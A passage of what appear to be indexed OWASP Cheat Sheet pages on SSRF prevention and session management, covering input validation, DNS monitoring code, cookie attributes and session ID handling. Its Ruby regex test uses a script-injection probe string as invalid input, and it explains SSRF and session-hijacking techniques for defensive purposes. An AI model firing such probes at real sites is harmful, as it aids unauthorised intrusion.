Verification of the proposed libraries has been performed to ensure that the proposed functions do not perform any DNS resolution query.

Example of execution of the proposed regex for Ruby:

domain_names = ["owasp.org", "owasp-test.org", "doc-test.owasp.org", "doc.owasp.org",
                "<script>alert(1)</script>", "<script>alert(1)</script>.owasp.org"]
domain_names.each { |domain_name|
  if ( domain_name =~ /^(((?!-))(xn--|_{1,1})?[a-z0-9-]{0,61}[a-z0-9]{1,1}\.)*(xn--)?([a-z0-9][a-z0-9\-]{0,60}|[a-z0-9-]{1,30}\.[a-z]{2,})$/ )
    puts "[i] #{domain_name} is VALID"
  else
    puts "[!] #{domain_name} is INVALID"
  end
}

$ ruby test.rb
[i] owasp.org is VALID
[i] owasp-test.org is VALID
[i] doc-test.owasp.org is VALID
[i] doc.owasp.org is VALID
[!] <script>alert(1)</script> is INVALID
[!] <script>alert(1)</script>.owasp.org is INVALID

After ensuring the validity of the incoming domain name, the second layer of validation is applied:

  1. Build an allow list with all the domain names of every identified and trusted application.
  2. Verify that the domain name received is part of this allow list (strict, case-sensitive string comparison).

Unfortunately here, the application is still vulnerable to the DNS pinning bypass mentioned in this document. Indeed, a DNS resolution will be made when the business code is executed. To address that issue, the following actions must be taken in addition to the validation of the domain name:

  1. Ensure that the domains that are part of your organization are resolved by your internal DNS server first in the chain of DNS resolvers.
  2. Monitor the domain allow list in order to detect when any of the domains resolves to:
     1. A local IP address (V4 + V6).
     2. An internal IP of your organization (expected to be in private IP ranges), for domains that are not part of your organization.

The following Python3 script can be used, as a starting point, for the monitoring mentioned above:

# Dependencies: pip install dnspython (ipaddress is part of the Python 3 standard library)
import ipaddress
import dns.resolver

# Configure the allow list to check
DOMAINS_ALLOWLIST = ["owasp.org", "labslinux"]

# Configure the DNS resolver to use for all DNS queries
DNS_RESOLVER = dns.resolver.Resolver()
DNS_RESOLVER.nameservers = ["1.1.1.1"]


def verify_dns_records(domain, records, type):
    """
    Verify if one of the DNS records resolves to a non-public IP address.
    Return a boolean indicating if any error has been detected.
    """
    error_detected = False
    if records is not None:
        for record in records:
            value = record.to_text().strip()
            try:
                ip = ipaddress.ip_address(value)
                # See https://docs.python.org/3/library/ipaddress.html#ipaddress.IPv4Address.is_global
                if not ip.is_global:
                    print("[!] DNS record type '%s' for domain name '%s' resolves to a non-public IP address '%s'!" % (type, domain, value))
                    error_detected = True
            except ValueError:
                error_detected = True
                print("[!] '%s' is not a valid IP address!" % value)
    return error_detected


def check():
    """
    Perform the check of the allow list of domains.
    Return a boolean indicating if any error has been detected.
    """
    error_detected = False
    for domain in DOMAINS_ALLOWLIST:
        # Get the IPs of the current domain
        # See https://en.wikipedia.org/wiki/List_of_DNS_record_types
        try:
            # A = IPv4 address record
            ip_v4_records = DNS_RESOLVER.query(domain, "A")
        except Exception as e:
            ip_v4_records = None
            print("[i] Cannot get A record for domain '%s': %s\n" % (domain, e))
        try:
            # AAAA = IPv6 address record
            ip_v6_records = DNS_RESOLVER.query(domain, "AAAA")
        except Exception as e:
            ip_v6_records = None
            print("[i] Cannot get AAAA record for domain '%s': %s\n" % (domain, e))
        # Verify the IPs obtained
        if verify_dns_records(domain, ip_v4_records, "A") or verify_dns_records(domain, ip_v6_records, "AAAA"):
            error_detected = True
    return error_detected


if __name__ == "__main__":
    if check():
        exit(1)
    else:
        exit(0)
"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#url","title":"URL","text":"

Do not accept complete URLs from the user, because URLs are difficult to validate and the parser can be abused depending on the technology used, as showcased by the following talk of Orange Tsai.

If network related information is really needed then only accept a valid IP address or domain name.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#network-layer","title":"Network layer","text":"

The objective of the Network layer security is to prevent the VulnerableApplication from performing calls to arbitrary applications. Only allowed routes will be available for this application in order to limit its network access to only those that it should communicate with.

The Firewall component, as a specific device or using the one provided within the operating system, will be used here to define the legitimate flows.

In the schema below, a Firewall component is leveraged to limit the application's access, and in turn, limit the impact of an application vulnerable to SSRF:

Network segregation (see this set of implementation advice) can also be leveraged and is highly recommended in order to block illegitimate calls directly at the network level.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#case-2-application-can-send-requests-to-any-external-ip-address-or-domain-name","title":"Case 2 - Application can send requests to ANY external IP address or domain name","text":"

This case happens when a user can control a URL to an External resource and the application makes a request to this URL (e.g. in case of WebHooks). Allow lists cannot be used here because the list of IPs/domains is often unknown upfront and is dynamically changing.

In this scenario, External refers to any IP that doesn't belong to the internal network, and should be reached by going over the public internet.

Thus, the call from the Vulnerable Application:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#challenges-in-blocking-urls-at-application-layer","title":"Challenges in blocking URLs at application layer","text":"

Based on the business requirements of the above mentioned applications, the allow list approach is not a valid solution. Despite knowing that the block-list approach is not an impenetrable wall, it is the best solution in this scenario. It informs the application of what it should not do.

Here is why filtering URLs is hard at the Application layer:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#available-protections_1","title":"Available protections","text":"

The same assumptions made in the example above also apply to the following sections.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#application-layer_1","title":"Application layer","text":"

As in case n°1, it is assumed that the IP address or domain name is required to create the request that will be sent to the TargetedApplication.

The first validation on the input data presented in case n°1 for the 3 types of data will be the same for this case, but the second validation will differ. Indeed, here we must use the block-list approach.

Regarding the proof of legitimacy of the request: the TargetedApplication that will receive the request must generate a random token (e.g. 20 alphanumeric characters) that the caller is expected to pass (in the body, via a parameter whose name is also defined by the application itself and only allows the character set [a-z]{1,10}) in order to perform a valid request, as sketched below. The receiving endpoint must only accept HTTP POST requests.
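
A minimal sketch of this token handling, assuming Python on the receiving side, is shown below; the function names are illustrative and the character-set rules mirror the ones stated above:

import re
import secrets
import string

TOKEN_ALPHABET = string.ascii_letters + string.digits
PARAM_NAME_PATTERN = re.compile(r"^[a-z]{1,10}$")
TOKEN_PATTERN = re.compile(r"^[a-zA-Z0-9]{20}$")

def generate_request_token() -> str:
    # 20 alphanumeric characters generated with a CSPRNG (the secrets module).
    return "".join(secrets.choice(TOKEN_ALPHABET) for _ in range(20))

def is_valid_token_submission(param_name: str, token: str) -> bool:
    # The caller-supplied parameter name and token must match the expected character sets.
    return bool(PARAM_NAME_PATTERN.fullmatch(param_name)) and bool(TOKEN_PATTERN.fullmatch(token))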

Validation flow (if any one of the validation steps fails, then the request is rejected):

  1. The application will receive the IP address or domain name of the TargetedApplication and it will apply the first validation on the input data using the libraries/regex mentioned in this section.
  2. The second validation will be applied against the IP address or domain name of the TargetedApplication using the following block-list approach:
  3. For IP address:
  4. For domain name:
     1. The application will verify that it is a public domain by trying to resolve it against a DNS resolver that only resolves internal domain names. Here, the resolver must return a response indicating that it does not know the provided domain, because the expected value must be a public domain.
     2. To prevent the DNS pinning attack described in this document, the application will retrieve all the IP addresses behind the domain name provided (taking A + AAAA records for IPv4 + IPv6) and apply the same verification described in the previous point about IP addresses.
  5. The application will receive the protocol to use for the request via a dedicated input parameter for which it will verify the value against an allowed list of protocols (HTTP or HTTPS).
  6. The application will receive the parameter name for the token to pass to the TargetedApplication via a dedicated input parameter for which it will only allow the characters set [a-z]{1,10}.
  7. The application will receive the token itself via a dedicated input parameter for which it will only allow the characters set [a-zA-Z0-9]{20}.
  8. The application will receive and validate (from a security point of view) any business data needed to perform a valid call.
  9. The application will build the HTTP POST request using only validated information and will send it (don't forget to disable the support for redirection in the web client used).
"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#network-layer_1","title":"Network layer","text":"

Similar to the network layer protections described for case n°1.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#imdsv2-in-aws","title":"IMDSv2 in AWS","text":"

In cloud environments SSRF is often used to access and steal credentials and access tokens from metadata services (e.g. AWS Instance Metadata Service, Azure Instance Metadata Service, GCP metadata server).

IMDSv2 is an additional defence-in-depth mechanism for AWS that mitigates some of the instances of SSRF.

To leverage this protection, migrate to IMDSv2 and disable the old IMDSv1. Check out the AWS documentation for more details.
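
As a hedged illustration (the instance ID and region below are placeholders), requiring IMDSv2 on an existing instance can be done through the EC2 ModifyInstanceMetadataOptions API, for example via boto3:

import boto3  # AWS SDK for Python

ec2 = boto3.client("ec2", region_name="eu-west-1")  # region is a placeholder

# Require IMDSv2 (session-oriented, token-based) on an existing instance and keep
# the hop limit low so the token cannot easily be relayed through a proxied SSRF.
ec2.modify_instance_metadata_options(
    InstanceId="i-0123456789abcdef0",  # placeholder instance ID
    HttpTokens="required",             # IMDSv1 requests without a token are refused
    HttpPutResponseHopLimit=1,
    HttpEndpoint="enabled",
)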

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#semgrep-rules","title":"Semgrep Rules","text":"

Semgrep is a command-line tool for offline static analysis. Use pre-built or custom rules to enforce code and security standards in your codebase. Check out the Semgrep rule for SSRF to identify/investigate SSRF vulnerabilities in Java: https://semgrep.dev/salecharohit:owasp_java_ssrf

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#references","title":"References","text":"

Online version of the SSRF bible (PDF version is used in this cheat sheet).

Article about Bypassing SSRF Protection.

Articles about SSRF attacks: Part 1, part 2 and part 3.

Article about IMDSv2

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#tools-and-code-used-for-schemas","title":"Tools and code used for schemas","text":"

Mermaid code for the SSRF common flow (screenshots are used to capture the PNG images inserted into this cheat sheet):

sequenceDiagram
    participant Attacker
    participant VulnerableApplication
    participant TargetedApplication
    Attacker->>VulnerableApplication: Crafted HTTP request
    VulnerableApplication->>TargetedApplication: Request (HTTP, FTP...)
    Note left of TargetedApplication: Use payload included<br>into the request to<br>VulnerableApplication
    TargetedApplication->>VulnerableApplication: Response
    VulnerableApplication->>Attacker: Response
    Note left of VulnerableApplication: Include response<br>from the<br>TargetedApplication

Draw.io schema XML code for the \"case 1 for network layer protection about flows that we want to prevent\" schema (screenshots are used to capture the PNG images inserted into this cheat sheet).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html","title":"Session Management Cheat Sheet","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Web Authentication, Session Management, and Access Control:

A web session is a sequence of network HTTP request and response transactions associated with the same user. Modern and complex web applications require the retaining of information or status about each user for the duration of multiple requests. Therefore, sessions provide the ability to establish variables \u2013 such as access rights and localization settings \u2013 which will apply to each and every interaction a user has with the web application for the duration of the session.

Web applications can create sessions to keep track of anonymous users after the very first user request. An example would be maintaining the user language preference. Additionally, web applications will make use of sessions once the user has authenticated. This ensures the ability to identify the user on any subsequent requests, as well as being able to apply security access controls, authorize access to the user's private data, and increase the usability of the application. Therefore, current web applications can provide session capabilities both pre and post authentication.

Once an authenticated session has been established, the session ID (or token) is temporarily equivalent to the strongest authentication method used by the application, such as username and password, passphrases, one-time passwords (OTP), client-based digital certificates, smartcards, or biometrics (such as fingerprint or eye retina). See the OWASP Authentication Cheat Sheet.

HTTP is a stateless protocol (RFC2616 section 5), where each request and response pair is independent of other web interactions. Therefore, in order to introduce the concept of a session, it is required to implement session management capabilities that link both the authentication and access control (or authorization) modules commonly available in web applications:

The session ID or token binds the user authentication credentials (in the form of a user session) to the user HTTP traffic and the appropriate access controls enforced by the web application. The complexity of these three components (authentication, session management, and access control) in modern web applications, plus the fact that their implementation and binding rest in the web developer's hands (as web development frameworks do not provide strict relationships between these modules), makes the implementation of a secure session management module very challenging.

The disclosure, capture, prediction, brute force, or fixation of the session ID will lead to session hijacking (or sidejacking) attacks, where an attacker is able to fully impersonate a victim user in the web application. Attackers can perform two types of session hijacking attacks, targeted or generic. In a targeted attack, the attacker's goal is to impersonate a specific (or privileged) web application victim user. For generic attacks, the attacker's goal is to impersonate (or get access as) any valid or legitimate user in the web application.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-properties","title":"Session ID Properties","text":"

In order to keep the authenticated state and track the user's progress within the web application, applications provide users with a session identifier (session ID or token) that is assigned at session creation time, and is shared and exchanged by the user and the web application for the duration of the session (it is sent on every HTTP request). The session ID is a name=value pair.

With the goal of implementing secure session IDs, the generation of identifiers (IDs or tokens) must meet the following properties.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-name-fingerprinting","title":"Session ID Name Fingerprinting","text":"

The name used by the session ID should not be extremely descriptive nor offer unnecessary details about the purpose and meaning of the ID.

The session ID names used by the most common web application development frameworks can be easily fingerprinted, such as PHPSESSID (PHP), JSESSIONID (J2EE), CFID & CFTOKEN (ColdFusion), ASP.NET_SessionId (ASP .NET), etc. Therefore, the session ID name can disclose the technologies and programming languages used by the web application.

It is recommended to change the default session ID name of the web development framework to a generic name, such as id.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-length","title":"Session ID Length","text":"

The session ID must be long enough to prevent brute force attacks, where an attacker can go through the whole range of ID values and verify the existence of valid sessions.

The session ID length must be at least 128 bits (16 bytes).

NOTE:

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-entropy","title":"Session ID Entropy","text":"

The session ID must be unpredictable (random enough) to prevent guessing attacks, where an attacker is able to guess or predict the ID of a valid session through statistical analysis techniques. For this purpose, a good CSPRNG (Cryptographically Secure Pseudorandom Number Generator) must be used.

The session ID value must provide at least 64 bits of entropy (if a good PRNG is used, this value is estimated to be half the length of the session ID).

Additionally, a random session ID is not enough; it must also be unique to avoid duplicated IDs. A random session ID must not already exist in the current session ID space.

NOTE:

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-content-or-value","title":"Session ID Content (or Value)","text":"

The session ID content (or value) must be meaningless to prevent information disclosure attacks, where an attacker is able to decode the contents of the ID and extract details of the user, the session, or the inner workings of the web application.

The session ID must simply be an identifier on the client side, and its value must never include sensitive information (or PII).

The meaning and business or application logic associated with the session ID must be stored on the server side, and specifically, in session objects or in a session management database or repository.

The stored information can include the client IP address, User-Agent, e-mail, username, user ID, role, privilege level, access rights, language preferences, account ID, current state, last login, session timeouts, and other internal session details. If the session objects and properties contain sensitive information, such as credit card numbers, it is required to duly encrypt and protect the session management repository.

It is recommended to use the session ID created by your language or framework. If you need to create your own session ID, use a cryptographically secure pseudorandom number generator (CSPRNG) with a size of at least 128 bits and ensure that each session ID is unique.
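
As a minimal sketch of such a generator (not a replacement for your framework's session handling), Python's secrets module draws from the operating system CSPRNG:

import secrets

def new_session_id() -> str:
    # 16 random bytes = 128 bits from the OS CSPRNG, meeting the minimum length
    # recommendation above; hex encoding yields a 32-character identifier.
    return secrets.token_hex(16)

# The application must still verify that the generated ID is not already present
# in the server-side session repository before using it.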

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-management-implementation","title":"Session Management Implementation","text":"

The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID. There are multiple mechanisms available in HTTP to maintain session state within web applications, such as cookies (standard HTTP header), URL parameters (URL rewriting \u2013 RFC2396), URL arguments on GET requests, body arguments on POST requests, such as hidden form fields (HTML forms), or proprietary HTTP headers.

The preferred session ID exchange mechanism should allow defining advanced token properties, such as the token expiration date and time, or granular usage constraints. This is one of the reasons why cookies (RFCs 2109 & 2965 & 6265) are one of the most extensively used session ID exchange mechanisms, offering advanced capabilities not available in other methods.

The usage of specific session ID exchange mechanisms, such as those where the ID is included in the URL, might disclose the session ID (in web links and logs, web browser history and bookmarks, the Referer header or search engines), as well as facilitate other attacks, such as the manipulation of the ID or session fixation attacks.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#built-in-session-management-implementations","title":"Built-in Session Management Implementations","text":"

Web development frameworks, such as J2EE, ASP .NET, PHP, and others, provide their own session management features and associated implementation. It is recommended to use these built-in frameworks rather than building a homemade one from scratch, as they are used worldwide on multiple web environments and have been tested by the web application security and development communities over time.

However, be advised that these frameworks have also presented vulnerabilities and weaknesses in the past, so it is always recommended to use the latest version available, which potentially fixes all the well-known vulnerabilities, as well as to review and change the default configuration to enhance its security by following the recommendations described throughout this document.

The storage capabilities or repository used by the session management mechanism to temporarily save the session IDs must be secure, protecting the session IDs against local or remote accidental disclosure or unauthorized access.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#used-vs-accepted-session-id-exchange-mechanisms","title":"Used vs. Accepted Session ID Exchange Mechanisms","text":"

A web application should make use of cookies for session ID exchange management. If a user submits a session ID through a different exchange mechanism, such as a URL parameter, the web application should avoid accepting it as part of a defensive strategy to stop session fixation.

NOTE:

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#transport-layer-security","title":"Transport Layer Security","text":"

In order to protect the session ID exchange from active eavesdropping and passive disclosure in the network traffic, it is essential to use an encrypted HTTPS (TLS) connection for the entire web session, not only for the authentication process where the user credentials are exchanged. This may be mitigated by HTTP Strict Transport Security (HSTS) for a client that supports it.

Additionally, the Secure cookie attribute must be used to ensure the session ID is only exchanged through an encrypted channel. The usage of an encrypted communication channel also protects the session against some session fixation attacks where the attacker is able to intercept and manipulate the web traffic to inject (or fix) the session ID on the victim's web browser (see here and here).

The following set of best practices are focused on protecting the session ID (specifically when cookies are used) and helping with the integration of HTTPS within the web application:

See the OWASP Transport Layer Protection Cheat Sheet for more general guidance on implementing TLS securely.

It is important to emphasize that TLS does not protect against session ID prediction, brute force, client-side tampering or fixation; however, it does provide effective protection against an attacker intercepting or stealing session IDs through a man in the middle attack.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#cookies","title":"Cookies","text":"

The session ID exchange mechanism based on cookies provides multiple security features in the form of cookie attributes that can be used to protect the exchange of the session ID:

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#secure-attribute","title":"Secure Attribute","text":"

The Secure cookie attribute instructs web browsers to only send the cookie through an encrypted HTTPS (SSL/TLS) connection. This session protection mechanism is mandatory to prevent the disclosure of the session ID through MitM (Man-in-the-Middle) attacks. It ensures that an attacker cannot simply capture the session ID from web browser traffic.

Forcing the web application to only use HTTPS for its communication (even when port TCP/80, HTTP, is closed in the web application host) does not protect against session ID disclosure if the Secure cookie has not been set - the web browser can be deceived into disclosing the session ID over an unencrypted HTTP connection. The attacker can intercept and manipulate the victim user's traffic and inject an unencrypted HTTP reference to the web application that will force the web browser to submit the session ID in the clear.

See also: SecureFlag

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#httponly-attribute","title":"HttpOnly Attribute","text":"

The HttpOnly cookie attribute instructs web browsers not to allow scripts (e.g. JavaScript or VBScript) the ability to access the cookies via the DOM document.cookie object. This session ID protection is mandatory to prevent session ID stealing through XSS attacks. However, if an XSS attack is combined with a CSRF attack, the requests sent to the web application will include the session cookie, as the browser always includes the cookies when sending requests. The HttpOnly cookie only protects the confidentiality of the cookie; the attacker cannot use it offline, outside of the context of an XSS attack.

See the OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet.

See also: HttpOnly

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#samesite-attribute","title":"SameSite Attribute","text":"

SameSite is a cookie attribute that prevents browsers from sending a SameSite-flagged cookie with cross-site requests. Its main goal is to mitigate the risk of cross-origin information leakage, and it also provides some protection against cross-site request forgery attacks.

See also: SameSite

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#domain-and-path-attributes","title":"Domain and Path Attributes","text":"

The Domain cookie attribute instructs web browsers to only send the cookie to the specified domain and all its subdomains. If the attribute is not set, by default the cookie will only be sent to the origin server. The Path cookie attribute instructs web browsers to only send the cookie to the specified directory or subdirectories (or paths or resources) within the web application. If the attribute is not set, by default the cookie will only be sent for the directory (or path) of the resource that set the cookie.

It is recommended to use a narrow or restricted scope for these two attributes. In other words, the Domain attribute should not be set (restricting the cookie to the origin server only) and the Path attribute should be set as restrictively as possible, to the web application path that makes use of the session ID.

Setting the Domain attribute to an overly permissive value, such as example.com, allows an attacker to launch attacks on the session IDs between different hosts and web applications belonging to the same domain, a scenario known as cross-subdomain cookies. For example, vulnerabilities in www.example.com might allow an attacker to get access to the session IDs from secure.example.com.

Additionally, it is recommended not to mix web applications of different security levels on the same domain. Vulnerabilities in one of the web applications would allow an attacker to set the session ID for a different web application on the same domain by using a permissive Domain attribute (such as example.com) which is a technique that can be used in session fixation attacks.

Although the Path attribute allows the isolation of session IDs between different web applications using different paths on the same host, it is highly recommended not to run different web applications (especially from different security levels or scopes) on the same host. Other methods can be used by these applications to access the session IDs, such as the document.cookie object. Also, any web application can set cookies for any path on that host.

Cookies are vulnerable to DNS spoofing/hijacking/poisoning attacks, where an attacker can manipulate the DNS resolution to force the web browser to disclose the session ID for a given host or domain.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#expire-and-max-age-attributes","title":"Expire and Max-Age Attributes","text":"

Session management mechanisms based on cookies can make use of two types of cookies: non-persistent (or session) cookies and persistent cookies. If a cookie presents the Max-Age attribute (which takes precedence over Expires) or the Expires attribute, it will be considered a persistent cookie and will be stored on disk by the web browser until the expiration time.

Typically, session management capabilities to track users after authentication make use of non-persistent cookies. This forces the session to disappear from the client if the current web browser instance is closed. Therefore, it is highly recommended to use non-persistent cookies for session management purposes, so that the session ID does not remain on the web client cache for long periods of time, from where an attacker can obtain it.
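As an illustration only, assuming a hypothetical cookie named SESSIONID, a Set-Cookie response header applying the attributes discussed in the preceding sections (Secure, HttpOnly, SameSite, no Domain, a restrictive Path, and no Expires/Max-Age so the cookie stays non-persistent) could look like:

Set-Cookie: SESSIONID=<random value>; Secure; HttpOnly; SameSite=Strict; Path=/app

The equivalent sketch with Express (the cookie name and path are illustrative):

res.cookie('SESSIONID', sessionId, {
  secure: true,        // only sent over HTTPS
  httpOnly: true,      // not readable via document.cookie
  sameSite: 'strict',  // not sent with cross-site requests
  path: '/app'         // restrict to the application path that uses the session ID
  // no maxAge/expires: the browser treats it as a non-persistent (session) cookie
});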

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#html5-web-storage-api","title":"HTML5 Web Storage API","text":"

The Web Hypertext Application Technology Working Group (WHATWG) describes the HTML5 Web Storage APIs, localStorage and sessionStorage, as mechanisms for storing name-value pairs client-side. Unlike HTTP cookies, the contents of localStorage and sessionStorage are not automatically shared within requests or responses by the browser and are used for storing data client-side.
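A minimal illustration of the two APIs (the key names are hypothetical); note that neither store is a recommended place for session identifiers:

// localStorage: shared across tabs of the same origin and persisted across browsing sessions
localStorage.setItem('ui.theme', 'dark');
console.log(localStorage.getItem('ui.theme'));

// sessionStorage: scoped to the current tab/window and cleared when it is closed
sessionStorage.setItem('wizard.step', '2');
console.log(sessionStorage.getItem('wizard.step'));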

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#the-localstorage-api","title":"The localStorage API","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#scope","title":"Scope","text":"

Data stored using the localStorage API is accessible by pages which are loaded from the same origin, which is defined as the scheme (https://), host (example.com), port (443) and domain/realm (example.com). This provides similar access to this data as would be achieved by using the secure flag on a cookie, meaning that data stored from https could not be retrieved via http. Due to potential concurrent access from separate windows/threads, data stored using localStorage may be susceptible to shared access issues (such as race-conditions) and should be considered non-locking (Web Storage API Spec).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#duration","title":"Duration","text":"

Data stored using the localStorage API is persisted across browsing sessions, extending the timeframe in which it may be accessible to other system users.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#offline-access","title":"Offline Access","text":"

The standards do not require localStorage data to be encrypted-at-rest, meaning it may be possible to directly access this data from disk.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#use-case","title":"Use Case","text":"

WHATWG suggests the use of localStorage for data that needs to be accessed across windows or tabs, across multiple sessions, and where large (multi-megabyte) volumes of data may need to be stored for performance reasons.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#the-sessionstorage-api","title":"The sessionStorage API","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#scope_1","title":"Scope","text":"

The sessionStorage API stores data within the window context from which it was called, meaning that Tab 1 cannot access data which was stored from Tab 2. Also, like the localStorage API, data stored using the sessionStorage API is accessible by pages which are loaded from the same origin, which is defined as the scheme (https://), host (example.com), port (443) and domain/realm (example.com). This provides similar access to this data as would be achieved by using the secure flag on a cookie, meaning that data stored from https could not be retrieved via http.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#duration_1","title":"Duration","text":"

The sessionStorage API only stores data for the duration of the current browsing session. Once the tab is closed, that data is no longer retrievable. This does not necessarily prevent access, should a browser tab be reused or left open. Data may also persist in memory until a garbage collection event.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#offline-access_1","title":"Offline Access","text":"

The standards do not require sessionStorage data to be encrypted-at-rest, meaning it may be possible to directly access this data from disk.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#use-case_1","title":"Use Case","text":"

WHATWG suggests the use of sessionStorage for data that is relevant to a single instance of a workflow, such as details for a ticket booking, where multiple workflows could be performed concurrently in other tabs. The window/tab-bound nature keeps the data from leaking between workflows in separate tabs.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#web-workers","title":"Web Workers","text":"

Web Workers run JavaScript code in a global context separate from the one of the current window. A communication channel with the main execution window exists, which is called MessageChannel.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#use-case_2","title":"Use Case","text":"

Web Workers are an alternative for browser storage of (session) secrets when storage persistence across page refresh is not a requirement. For Web Workers to provide secure browser storage, any code that requires the secret should exist within the Web Worker and the secret should never be transmitted to the main window context.

Storing secrets within the memory of a Web Worker offers the same security guarantees as an HttpOnly cookie: the confidentiality of the secret is protected. Still, an XSS attack can be used to send messages to the Web Worker to perform an operation that requires the secret. The Web Worker will return the result of the operation to the main execution thread.

The advantage of a Web Worker implementation compared to an HttpOnly cookie is that a Web Worker allows for some isolated JavaScript code to access the secret; an HttpOnly cookie is not accessible to any JavaScript. If the frontend JavaScript code requires access to the secret, the Web Worker implementation is the only browser storage option that preserves the secret confidentiality.
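A minimal sketch of this pattern with hypothetical message types and endpoints: the secret is stored only inside the worker, and the main window only asks the worker to perform operations that need it.

// worker.js - the secret (e.g. an access token) lives only in the worker's scope
let token = null;
self.onmessage = async (e) => {
  if (e.data.type === 'store') {
    token = e.data.token;                    // never echoed back to the main window
  } else if (e.data.type === 'fetch') {
    // the worker attaches the secret itself; only the result is returned
    const res = await fetch(e.data.url, { headers: { Authorization: `Bearer ${token}` } });
    self.postMessage({ type: 'result', status: res.status });
  }
};

// main.js
const worker = new Worker('worker.js');
worker.onmessage = (e) => console.log('worker result:', e.data);
worker.postMessage({ type: 'store', token: 'value-from-login-response' });
worker.postMessage({ type: 'fetch', url: '/api/profile' });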

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-life-cycle","title":"Session ID Life Cycle","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-generation-and-verification-permissive-and-strict-session-management","title":"Session ID Generation and Verification: Permissive and Strict Session Management","text":"

There are two types of session management mechanisms for web applications, permissive and strict, related to session fixation vulnerabilities. The permissive mechanism allows the web application to initially accept any session ID value set by the user as valid, creating a new session for it, while the strict mechanism enforces that the web application will only accept session ID values that have been previously generated by the web application.

The session tokens should be handled by the web server if possible or generated via a cryptographically secure random number generator.
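For cases where the application must generate its own tokens, a minimal Node.js sketch using the built-in CSPRNG (the 32-byte length is illustrative, not a normative value from this cheat sheet):

const crypto = require('crypto');

// 32 random bytes from a cryptographically secure source,
// hex-encoded into a 64-character session token
function generateSessionId() {
  return crypto.randomBytes(32).toString('hex');
}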

Although the most common mechanism in use today is the strict one (more secure), PHP defaults to permissive. Developers must ensure that the web application does not use a permissive mechanism under certain circumstances. Web applications should never accept a session ID they have never generated, and in case of receiving one, they should generate and offer the user a new valid session ID. Additionally, this scenario should be detected as a suspicious activity and an alert should be generated.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#manage-session-id-as-any-other-user-input","title":"Manage Session ID as Any Other User Input","text":"

Session IDs must be considered untrusted, like any other user input processed by the web application, and they must be thoroughly validated and verified. Depending on the session management mechanism used, the session ID will be received in a GET or POST parameter, in the URL or in an HTTP header (e.g. cookies). If web applications do not validate and filter out invalid session ID values before processing them, they can potentially be used to exploit other web vulnerabilities, such as SQL injection if the session IDs are stored in a relational database, or persistent XSS if the session IDs are stored and later reflected back by the web application.
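A minimal sketch of such validation, assuming the illustrative hex-encoded token format from the previous example: anything that does not match the expected format is rejected before it reaches a datastore or template.

// Accept only session IDs with the exact expected format (here: 64 hexadecimal characters)
const SESSION_ID_FORMAT = /^[a-f0-9]{64}$/;

function isValidSessionId(candidate) {
  return typeof candidate === 'string' && SESSION_ID_FORMAT.test(candidate);
}

// e.g. in an Express middleware:
// if (!isValidSessionId(req.cookies.SESSIONID)) { return res.status(400).end(); }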

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#renew-the-session-id-after-any-privilege-level-change","title":"Renew the Session ID After Any Privilege Level Change","text":"

The session ID must be renewed or regenerated by the web application after any privilege level change within the associated user session. The most common scenario where session ID regeneration is mandatory is during the authentication process, as the privilege level of the user changes from the unauthenticated (or anonymous) state to the authenticated state (though in some cases still not yet to the authorized state). Other common scenarios to consider include password changes, permission changes, or switching from a regular user role to an administrator role within the web application. For all sensitive pages of the web application, any previous session IDs must be ignored, only the current session ID must be assigned to every new request received for the protected resource, and the old or previous session ID must be destroyed.

